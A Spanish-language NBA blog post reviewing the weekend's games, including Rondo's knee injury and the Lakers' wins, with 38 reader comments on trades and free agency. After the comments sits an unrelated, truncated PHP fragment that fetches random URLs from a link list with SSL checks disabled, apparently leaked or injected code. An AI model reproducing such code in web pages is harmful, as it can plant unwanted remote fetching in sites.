Informe del fin de semana: Rondo down!

28 de January de 2013 por MagicJohnson32

rondoTodos los partidos del fin de semana, todo queda eclipsado por la lesión de ligamentos en la rodilla derecha de Rajon Rondo, que lo mantendrá alejado de las canchas lo que queda de temporada. La noticia emergió durante el encuentro que anoche disputaron en el TD Garden sus Celtics contra Miami Heat, un partido excelente y loco, que acabó cayendo del lado local tras dos prórrogas. Pierce, autor de un triple doble, y Garnett lideraron el triunfo, aunque la defensa de Green sobre LeBron en el tramo final fue igualmente fundamental. La celebración de los jugadores de los Celtics tras ganar al campeón y poner fin a una racha de seis derrotas seguidas duró poco, ya que inmediatamente después supieron de la grave lesión de su compañero. Al menos sirvió para maquillar un fin de semana que podría haber sido absolutamente negro y que se había iniciado el viernes con una derrota, también con dos prórrogas, en Atlanta, donde los Hawks remontaron 27 puntos gracias en buena parte a los ocho triples anotados por Korver. En cualquier caso, a los Celtics se les complica enormemente la posibilidad de acceder a Playoffs a poco que los Sixers enderecen el rumbo.

Mejor le fue al otro ‘clásico-en-apuros’, unos Lakers que encaraban un fin de semana crucial, a un paso del abismo con dos compromisos complicados en casa tras cuatro derrotas seguidas. Se podrá acusar a D’Antoni de muchas cosas pero al menos está probando variantes que se alejan de su credo baloncestístico. La que vimos tanto el viernes ante los Jazz como anoche contra los Thunder parte de situar a Kobe como creador de juego desde el poste medio. Los resultados han sido incontestables: dos victorias de mérito -especialmente la obtenida ante OKC-, dos de los mejores partidos colectivos de los Lakers en lo que va de temporada y dos recitales de Bryant que dan esperanzas a los angelinos de cara a la segunda mitad de fase regular. Gasol, por cierto, estuvo notable en ambos encuentros en su papel de 6º hombre. Los Lakers se sitúan así con un balance de 19-25 y se mantienen con tres derrotas más que los Rockets, poseedores de la octava plaza del Oeste después de que James Harden les condujese a la victoria en sus dos partidos del fin de semana: 30 puntos, 8 asistencias el viernes ante Hornets y 29 puntos, 7 asistencias el sábado ante Nets para el nuevo All Star.

irving threeTambién 2 de 2 registraron los Cavs por obra y gracia de su All Star particular, un Kyrie Irving deslumbrante y estelar, tal y como demostró el sábado con su estratosférico triple ganador en Toronto. Si la noche anterior se había exhibido con 35 puntos (12 de 17 en tiros de campo) ante los Bucks, frente a los Raptors se fue a los 32 y suma 107 puntos anotados en sus últimas tres actuaciones. Igualmente impecable resultó el fin de semana para los Wizards, a quienes la vuelta de John Wall les ha dado un cierto empaque, un aire de equipo serio que se les echaba en falta. Sin llegar a la brillantez, tuvieron suficiente para vencer a T’Wolves y Bulls.

Una de las novedades es que los Spurs se sitúan con el mejor balance de la liga. Sin Duncan ni Popovich, ambos enfermos, y con Tony Parker a los mandos, los texanos ganaron el viernes a los Mavs y el sábado a los Suns. Suman ocho victorias seguidas y parecen destinados a disputarse el mejor balance de la liga con los Thunder y los Heat, que anoche cayeron en Boston pero el viernes habían arrasado a los Pistons. ¿Y los Clippers? La vida sin Chris Paul se está haciendo larga, pese al cada vez mejor rendimiento de Griffin. El back-to-back contra los Blazers acabó con una victoria para cada equipo y en el caso de los angelinos sirvió para acabar con las cuatro derrotas que acumulaban.

Nueve triples (récord de la franquicia) y 42 puntos de Carmelo Anthony hicieron falta para que los Knicks superasen a los Hawks anoche en el MSG. Estaba claro que la mala racha de tiro de Melo, que costó una derrota el viernes en Philadelphia, no iba a durar. Y si hablamos de triples, hablamos de Ryan Anderson, que anotó siete en el triunfo de los Hornets sobre los Grizzlies, que además perdieron a Conley tras una torcedura de tobillo. Memphis, por su parte, había barrido a los Nets el viernes y se mantiene en la cuarta plaza del Oeste.

Otros equipos que acabaron el fin de semana con un balance de 1-1 fueron los Mavs, con derrota ante Spurs y victoria sobre los Suns, y los Pistons, que tras la paliza recibida en Miami el viernes, sufrieron anoche pero superaron a los Magic con un gran Brandon Knight. Entre los grandes perdedores del fin de semana están los Warriors, que han iniciado su gira por el Este con dos derrotas en Chicago y Milwaukee, y los Kings, que poco pudieron hacer frente a Thunder y Nuggets.

No podemos dejar sin mención el increíble triple de Gerald Henderson para dar la victoria a los Bobcats sobre Minnesota y el final de locura que se vivió en el Pacers @ Jazz, con tres pérdidas de Hayward en el último minuto ante George Hill que llevaron el partido a una improbable prórroga, donde sin embargo se impusieron los locales.

kobe passPREMIOS

MVP: Dos victorias de los Lakers con Kobe Bryant promediando 14 asistencias por partido, a un rebote del triple-doble y un acierto en el tiro de más del 67%. Tremendo. Kyrie Irving también llevó a su equipo a la victoria en los dos partidos del fin de semana con 33’5 puntos de media, y Harden hizo 29’5 puntos y 7’5 asistencias en los dos triunfos de los Rockets.

Rookie: No ha sido un gran fin de semana para los más jóvenes. Damian Lillard ha anotado 18 puntos de media pero no ha estado muy acertado en el tiro y Anthony Davis parece anclado en los 10 puntos y 7 rebotes.

Sorpresa: Partidazo de JJ Redick anoche frente los Pistons. El de Orlando anotó 31 puntos, cogió 6 rebotes y robó 3 balones. El sábado vimos dos actuaciones completísimas de George Hill, Luke Ridnour y Chandler Parsons. El primero consiguió un 22-9-8, el segundo, un 22-7-7 y el tercero, 16-6-11. El viernes fue Kyle Korver el que se salió con 27 puntos, 6 rebotes, 4 asistencias y 3 robos en la remontada de los Hawks.

Esfuerzo en vano: Carmelo Anthony, LeBron James y Kevin Durant. Los 3 mejores aleros de la liga se han salido este fin de semana pero no han podido contar sus partidos con victorias. Lo mismo podría decirse de Blake Griffin.

TOP 10

Comenta

38 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Hoy día de luto para los aficionados célticos… curiosamente después de ganar a los campeones tras 6 derrotas seguidas. La pérdida de Rondo es irreemplazable para los verdes y prácticamente acaba con las ilusiones de que este equipo se iría conjuntando para ser un hueso duro a la hora de los PO como han hecho otros años… guiados precisamente por Rajon. Ahora muchas dudas quedan por solventar en Boston. ¿Traspasar a Pierce o Garnett para intentar la reconstrucción? ¿Traspasar algunos de sus jugadores interesantes de rotación (Lee, Terry, Bass) a cambio de un pivot y un base para intentar hacer algo este año? ¿Dejar el equipo así e intentar contratar algún agente libre o jugador cortado para “sustituir” de alguna manera a Rondo? Veremos que decide Ainge que tiene un papelón encima de la mesa.
    Quitando esto anoche los verdes volvieron a ser ellos en un partido grande. Defensa a muerte (fenomenal Jeff Green) y ramalazos de casta y clase de Pierce y Garnett para llevarse el partido ante los campeones y amargarle la vuelta a Boston de Ray Allen que hizo un gran partido. Partidazo del rey al que no es la primera vez que una super actuación no le vale para conseguir la victoria. Por cierto fenomenal el público y la franquicia de Boston con un video antes del partido homenaje a Ray y los aplausos de todo el público. Luego en cuanto empezó el partido y tocó su primera bola silbidos como corresponde a un jugador enemigo a partir de ahora. Un club y una afición míticos y que entienden de basket.
    En LA, los Lakers parecen encontrar un poco su el norte, aunque no hay que echar las campanas al vuelo… Mejor defensa con Clark y Artest poniendo presión sobre Durant y muy mejorado el ataque con Kobe haciendo de base-anotador al estilo Michael Jordan desde el poste medio. Fatal Howard, el resto del equipo funcionó bastante bien lo que unido al pésimo partido de tiro de Westbrook acabó con la victoria angelina. Ahora tienen una gira los Lakers que nos demostrará si la mejoría es de verdad y tiran de una vez hacia puestos de PO o si vuelven a caer en el caos. Por OKC derrota sin más, no hay que preocuparse demasiado.
    Y una última cosa. Con los resultados de ayer el mejor record de la NBA es…… San Antonio Spurs!!! Claro, como siempre ellos a lo suyo no fallan siguen ganándo y ya son el mejor equipo hasta ahora, que grande es esta franquicia y este equipo.

      Citar

  2. Jose Luis dice:
    #2

    Lee, Terry y Bass son poco interesantes por lo largo y costoso de sus contratos. No creo que haya muchos equipos capaces de comerse esos contratos soltando un pívot y un base. El de Terry es deleznable por su edad, pero el de Bass no se queda muy atrás por su calidad, y Lee parece un conjunto de buenas características que no son tan buenas en realidad (quiero decir, pensamos en Lee como un 2 tirador, defensor y atlético, pero ni es tan buen tirador, ni tan buen defensor, ni tan atlético). Jugadores como Lee hay varios en la liga con contratos más asumibles.

      Citar

  3. nba dice:
    #3

    Ya te digo yo Jose Luis, que Jim haria el trato ahora mismo, asi se podrian centrar en renovar-extender a Howard sin miramientos y evitar las dudas para el año que viene, ahora solo faltaria Tyreke…

      Citar

  4. Esteban dice:
    #4

    terry no es apaetecible? los Nets moririan por tenerlo, esta teniendo una mala temporada si, pero a 5 millones, es mas que un lujo de sexto hombre, que bien les vendria a los PACERS!!!

      Citar

  5. Jose Luis dice:
    #5

    @Esteban ¿15 millones los próximos 3 años? ¿Con el rendimiento que está dando?

    @nba: explícame el movimiento paso por paso. ¿Qué jugadores querrían los Kings/Sonics a cambio de Tyreke? y sobre todo, ¿para qué quieren los Lakers a Tyreke? Los Lakers quieren flexibilidad para esa temporada, y por casi nada del mundo van a cambiarla. Pero de todas formas explícamelo, a ver si le veo sentido.

      Citar

  6. Jose Luis dice:
    #6

    Y no está nada claro que Howard quiera renovar… Si no renueva, te ves sin pívot.

      Citar

  7. nba dice:
    #7

    La flexibilidad la obtienen con la salida de Pau,con eso a Howard se le quitarian todas la dudas
    Hacen un sing+trade por Tyreke por 10 millones que envian a Lakers, que les envian a Meeks+Sacre+MWP

      Citar

  8. Jose Luis dice:
    #8

    Lo que quieren es ir a la agencia libre en verano de 2014, y con Nash, Howard, Bryant si renueva y Tyreke, poco van a poder ir a la agencia libre.

    Aparte, ¿qué le ves a Tyreke? No sé para qué quieren los Lakers a este jugador… de escolta está Bryant y de base Nash, y no veo a Tyreke el mejor alero para jugar con Nash, que debe ser un jugador capaz de lanzar triples.

      Citar

  9. Jose Luis dice:
    #9

    En cuanto a los Lakers, tienen ahora 4 partidos que pueden y deberían ganar si quieren acercarse a los play-offs, antes de visitar a los Nets donde una derrota sería asumible. Tras los Nets, vienen Celtics, Bobcats y Heat, todos fuera. Creo que un balance 6-2 no estaría mal, un 5-3 en estos 8 partidos les dejaría ahí ahí, y creo que cualquier cosa más allá les deja totalmente eliminados. Perder en casa de Nets, Heat y alguno más entra dentro de lo posible si quieren ir a PO, perder 4 partidos es olvidarse.

      Citar

  10. nba dice:
    #10

    Jose Luis:
    Lo que quieren es ir a la agencia libre en verano de 2014, y con Nash, Howard, Bryant si renueva y Tyreke, poco van a poder ir a la agencia libre.

    Aparte, ¿qué le ves a Tyreke? No sé para qué quieren los Lakers a este jugador… de escolta está Bryanty de base Nash, y no veo a Tyreke el mejor alero para jugar con Nash, que debe ser un jugador capaz de lanzar triples.

    Yo es que a Tyreke lo veo como un jugador joven valido de perimetro y que no se suba a las barbas del que parecen que en Lakers quieren que sea el jugador franquicia tras Bryant, que sera Howard.
    A Nash no le veo cumpliendo todo su contrato en Lakers

      Citar

  11. Jose Luis dice:
    #11

    Pues yo la verdad es que a Tyreke le veo más bien poca cosa, no sé qué opinara el resto de asiduos al blog. Pero sobre todo creo que los Lakers no van a traspasar a Pau ante la posibilidad de que Howard no renueve y quedarse sin hombre grande.

      Citar

  12. Esteban dice:
    #12

    Jose Luis:
    @Esteban ¿15 millones los próximos 3 años? ¿Con el rendimiento que está dando?

    @nba: explícame el movimiento paso por paso.¿Qué jugadores querrían los Kings/Sonics a cambio de Tyreke? y sobre todo, ¿para qué quieren los Lakers a Tyreke? Los Lakers quieren flexibilidad para esa temporada, y por casi nada del mundo van a cambiarla. Pero de todas formas explícamelo, a ver si le veo sentido.

    si jose luis me parece muy interesante, mas teniendo en cuenta que uno de esos 3 años se esta consumiendo en la actualidad, asi que desopues de esta temporada le quedarian 2 años nada mas

    y por mas que su rendimiento sea flojo hoy, y promedia pocos puntos, la nba en general empieza con los PO, alli no cualquiera la mete y terry va a demiostrar su valia en ese momento
    en la regular cualquiera anota 10 ppp, pero en PO no es lo mismo,
    como dije ojala los pacers lo vean

      Citar

  13. Ruxixón dice:
    #13

    Una pena enorme la lesión de Rondo,que se une así a esa lista negra que en muy pocos años ha llevado a muchos bases de la liga a perderse temporadas enteras.Es una epidemia.

    Yo soy de los que respetan a sus símbolos,e imaginarse a Paul Pierce con otra camiseta,después de toda una carrera como jugador de baloncesto en el mismo equipo se me hace muy complicado,más cuando en todo ese tiempo ha vivido lo mejor y lo peor de una franquicia histórica que hace nada se debatía entre los últimos puestos de la liga,ya por entonces con Doc al mando.Pero si hay que decidir entra KG y PP me decanto por el segundo.Suena que les puede interesar Lowry.Es un contrato barato que parece no tener hueco en los Raptors actualmente aunque creo que se equivocan.No sé qué intención pueden tener en traspasarlo los de Toronto aunque es cierto que dependiendo de lo que den,Paul Pierce puede suponer ese empujón para una segunda parte de la temporada que les lleve a los PO -paradójico que Boston y Toronto sean rivales en esa hipotética lucha-.

    En un primer momento yo me fui a largo plazo y pensé más en un jugador complementario a Rondo cuando éste vuelva,una especie de combo guard.Es cierto que su ética profesional y su bagaje no invite a pensar en una opción que te lleva seguro a los PO,pero el nombre que yo aporto es Monta Ellis,el cual parece que la campaña que viene no seguirá en Milwaukee.Un Monta Ellis + Dunleavy/Gooden por Paul Pierce más relleno podía ser una oportunidad,siempre y cuando convenzas a Ellis de ejecutar su PO prometiéndole un buen contrato para la 14/15.

      Citar

  14. Ruxixón dice:
    #14

    Aparte del triple de Irving vs Raptors,hay una canasta anterior que es la leche

    http://youtu.be/e_iXzf6NnlM?t=2m31s

    Y ya que me llene la boca en su momento,Okafor me está callando xDD

      Citar

  15. Jose Luis dice:
    #15

    Bueno, puedes tener razón Esteban, a los Pacers les vendría muy bien. Podrían traspasarlo por Augustin, un base que no está jugando bien en Indiana y que es lo que necesitan los Celtics, un base expiring, cuyo mejor característica es hacer jugar y poco más, podría valer de suplente de Rondo si decide renovar allí, aunque sabría que va a jugar muy pocos minutos.

      Citar

  16. Viva_Dirk dice:
    #16

    Del trade que dice nba no se donde iria Pau, pero traer a Tyreke por MWP+Meeks+Sacre me parecería un chollazo. Tyreke ha tenido problemas de lesiones, pero si recordais su año rookie podeis fliparlo, jeje.

    De todos modos, creo que Lakers, salvo que encontraran algo muy claro por Pau no van a moverse.

      Citar

  17. Jose Luis dice:
    #17

    Están poniendo aquí el partido de los Lakers de anoche:

    http://canalnba.webpin.com/1419354_C-deportes24h.html

      Citar

  18. Denise dice:
    #18

    Jose Luis:
    Pues yo la verdad es que a Tyreke le veo más bien poca cosa, no sé qué opinara el resto de asiduos al blog. Pero sobre todo creo que los Lakers no van a traspasar a Pau ante la posibilidad de que Howard no renueve y quedarse sin hombre grande.

    Mi opinión de Tyreke Evans es que es un jugador que se ha venido abajo supongo que por su mala conducta y cabeza, y que va para atrás como los cangrejos. Está claro que hizo una excelente temporada rookie y que tenía madera para llegar al nivel de Wade o Rose, pero se perdió y actualmente, para mí es un jugador hacenúmeros con calidad para hacerte 10 partidos al año por encima de los 25 puntos, pero ni mucho menos para ponerlo a co-liderar una franquicia ganadora.
    Que los recuerdos de su temporada rookie son mjuy bonitos…pues si, pero también hubo un día en el que Biedrins era uno de los mejores Centers y con mas futuro de la liga.

    Tener a Evans como 6º hombre no está mal, pero no es un buen fichaje si para ello tienes que sacrificar a alguno de los 3 mejores de tu plantilla.

      Citar

  19. Denise dice:
    #19

    Viva_Dirk:
    Del trade que dice nba no se donde iria Pau, pero traer a Tyreke por MWP+Meeks+Sacre me parecería un chollazo. Tyreke ha tenido problemas de lesiones, pero si recordais su año rookie podeis fliparlo, jeje.

    No sé de donde ha salido ese trade, pero es una autentica estafa a los Kings tanto deportiva como economicamente. Totalmente irreal.

      Citar

  20. Chipi dice:
    #20

    ¿Es cosa mía o en los tiempos muertos la voz cantante la llevan Kobe y Nash mientras D’Antoni se atusa los bigotes?

      Citar

  21. MagicJohnson32 dice:
    #21

    Chipi:
    ¿Es cosa mía o en los tiempos muertos la voz cantante la llevan Kobe y Nash mientras D’Antoni se atusa los bigotes?

    Lo mismo me da, mientras no sea Metta World Peace quien lleve la voz cantante.

      Citar

  22. Esteban dice:
    #22

    Ruxixón:
    Aparte del triple de Irving vs Raptors,hay una canasta anterior que es la leche

    http://youtu.be/e_iXzf6NnlM?t=2m31s

    Y ya que me llene la boca en su momento,Okafor me está callando xDD

    y a quien no? grande EMEKA! cuando los wizards hicieron elf trade con NOH ya con nene y wall, los veia como un equipo de PO, bueno lkas lesiones de nene era previsibles pero la de wall tiro todo por la borda,

    ahora veo un buen equipo, la linea frontal nene y okafor me gusta y mucho, mientras que wall y beal estan en buena forma, una pena ARIZA de flojo rendimiento y crawford a quien veia pasta para sexto hombre

    pese a todo, han ganado varios juegos ultimamente y el futuro parece algo menos negro y un poco mas gris

      Citar

  23. franitis dice:
    #23

    Hay un tema con el contrato de Pierce. En 2013-2014 tiene un contrato de 15 millones, de los que sólo 5 están asegurados y puede ejecutarse una “player option”; con 5 millones se le libera… Y se trabaja el mercado de FA en la búsqueda de algo bueno por unos 16 millones al año. Rudy Gay no me atrae en absoluto…

    Mercado de FA:

    – Monta Ellis
    – Josh Smith
    – Paul Millsap
    – All Jefferson (aunque este ha dicho que no vuelve a Boston, “ni loco”…)
    – ¿Pekovic? (Si se pone a tiro…)

    Si lo que buscamos es un anotador, está claro que la apuesta es Ellis, pero es necesario un hombre fuerte en el frontcourt… Smith sería la leche…

      Citar

  24. Jose Luis dice:
    #24

    Estás hablando de Boston no franitis?

    O sea, tu piensas que con el equipo de ahora, contando a Rondo, y cambiando Pierce por Smith, ¿serían candidatos a algo más que semifinal de conferencia?

      Citar

  25. franitis dice:
    #25

    De Boston sí, hablo de la próxima temporada. Sería un salto de calidad importante, entiendo que Smith es más PF que SF, pero creo que jugando con Green y Sullinger, manteniendo a KG de center, se puede hacer un quinteto interesante, que podría optar a algo más en el este (recordemos que el año pasado llegaron a finales de conferencia con un equipo a priori peor que el de este año…).

      Citar

  26. MagicJohnson32 dice:
    #26

    franitis:
    Mercado de FA:

    – Monta Ellis
    – Josh Smith
    – Paul Millsap
    – All Jefferson (aunque este ha dicho que no vuelve a Boston, “ni loco”…)
    – ¿Pekovic? (Si se pone a tiro…)

    – Dwight Howard
    – Andrew Bynum

      Citar

  27. Jose Luis dice:
    #27

    Bueno, no veo el equipo muy superior al de este año, y ya hay más potencias en el este: Knicks, Nets, Heat, Pacers, están bien armados, súmale a Bynum si renueva. No sé, yo creo que cambiar a Pierce por Smith no cambiaría apenas los resultados.

    Casi preferiría un pívot… Pekovic o ya Bynum o Howard sería mucho mejor, claro está.

      Citar

  28. franitis dice:
    #28

    Hombre, si se puede… Howard lo veo la base del proyecto futuro de LAL, por lo tanto lo veo inalcanzable. En cuanto a Bynum, no me fío un pelo de su estado de salud…

    Hablando de “Prosineckis” de la vida; he leído algún rumor que Boston preguntó por Greg Oden para la próxima temporada… Bufff

      Citar

  29. Esteban dice:
    #29

    los celtics no pueden jugar en la agencia libre, estan exedidos del tope y no vale la pena ni el riesgo borrar a un tal PIERCE

    no sera ya la verdad que fue, y esta medio viejito, pero por lejos por 15 millones y un solo año de contrato, no habra nadie mejor que el,

    eso si lo que quiere boston es intentar seguir siendo protagonista

    en caso que quieran reconstruir, muchos trades serian bueno y probables, salir tanto el como garnett, por jovenes y rondas

    pierce encajaria a la perfeccion en los JAZZ, a cambio de jefferson si renueva antes del trade, boston necesita un centro anotador y eso a la vez daria lugar entre los titulares a green a ver si explota y rejuveneceria al equipo

    el jazz cubriria su puesto mas debil con un MVP de finales que los puede llevar a otro nivel, entre favors y kanter cubririan el puesto de jeferrson

    podria se runa posbilidad

    yo em quedaria con pierce y su año de contrato que no hace mal a nadie, si me desharia de garnett, a minesota por pekovic? eso seria bueno, rejuveneceria a los celtics y llevaria una gloria a los wolves a cambio de un jugador que de todas formas va a perder a fin de año, podria sumarsele a barea para los celtics y varios problemas resueltos

    es lindo pensar esto, pero nada ocurrira, los celtics ficharan algun base, delonte west? y seguiran adelante y hasta quiza llegen a segunda ronda, es un nucleo de jugadores muy querido para borrarlos de un plumazo

      Citar

  30. Esteban dice:
    #30

    alguien que conozca mas la NBA que yo, puede explicarme que vio ANGIE en Courtney Lee para darle semejante contrato?

    aun asi, los quiero en mis PACERS, necesitamos un dos tirador, sea el quien sea

      Citar

  31. Jose Luis dice:
    #31

    Esteban, se escribe Ainge, que Angie es nombre de chica ostia xD

    De Courtney Lee es lo que yo he dicho… le tenemos por defensor, atlético y tirador, pero no es especialista en nada de eso y se diluye. No es un sobresaliente en cada cosa, es un bien o como mucho un notable en alguna (quizá en defensa) pero poco más, y tiene demasiado contrato.

      Citar

  32. Esteban dice:
    #32

    si alto clavo el contrato de LEE, hoy para mi gusto el menos traspasable de todos los celtics, hasta green por momentos hace alguna que otra jugada que hace ver menos loco su contrato

    hablando de green, sus numeros no dicen mucho, pero es un muy buen jugador, de esos que no salen del banco, los que juegan de entrada, con la bola en las manos bastante rato, no es un jugador de rol, un tirador o un definidor, puede hacer varias cosas pero necersita minutos y confianza, detras de pierce se arruina

    ojo que si alguien lo nota puede ser muy util en otra escuadra, buck principalmente, jazz, cavs, suns y wizards, deberian pensar en ofrcer algo por el

      Citar

  33. Jones dice:
    #33

    Yo estoy con Esteban, Green me parece mucho mejor jugador de lo que pensáis, es cierto que ha tenido problemas de corazón, pero estamos hablando de un número 3 del draft de Durant (vale, no hay que hacer caso a los números altos de draft normalmente), es un chaval que puede hacer grandes cosas si se le permite…sobretodo a nivel defensivo

      Citar

  34. Jose Luis dice:
    #34

    Fue el nº5. El 3 fue Horford y el 4 Mike Conley.

    Si, quizá sea mejor de lo que parece, yo creo que está para titular en algún equipo, pero no creo que tenga nivel de 2º espada.

      Citar

  35. Jones dice:
    #35

    Lo siento perdón por mi lapsus, he hablado de memoria jajajaja nah, de segunda espada tampoco, pero de un titular capaz de meter sus puntos y defender bien, estilo Metta World Peace pero con un poco más de cabeza…

      Citar

  36. Jones dice:
    #36

    Por cierto, se habla de que va a volver Bogut hoy y que podría ser hasta titular frente los Raptors, a partir de ahora, si todo va bien, conoceremos el verdadero potencial de estos Warriors…

      Citar

  37. MagicJohnson32 dice:
    #37

    Anda, noticia: Bogut vuelve hoy y estará en el quinteto inicial de los Warriors contra los Raptors.

      Citar

  38. Esteban dice:
    #38

    Jose Luis:
    Fue el nº5. El 3 fue Horford y el 4 Mike Conley.

    Si, quizá sea mejor de lo que parece, yo creo que está para titular en algún equipo, pero no creo que tenga nivel de 2º espada.

    bue segunda/tercer espada en el THUNDER cuando perdieron 4-2 con los lakers en priemera ronda, y durante toda la campaña antes de ser traspasado, mal no le iba ni de coña

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>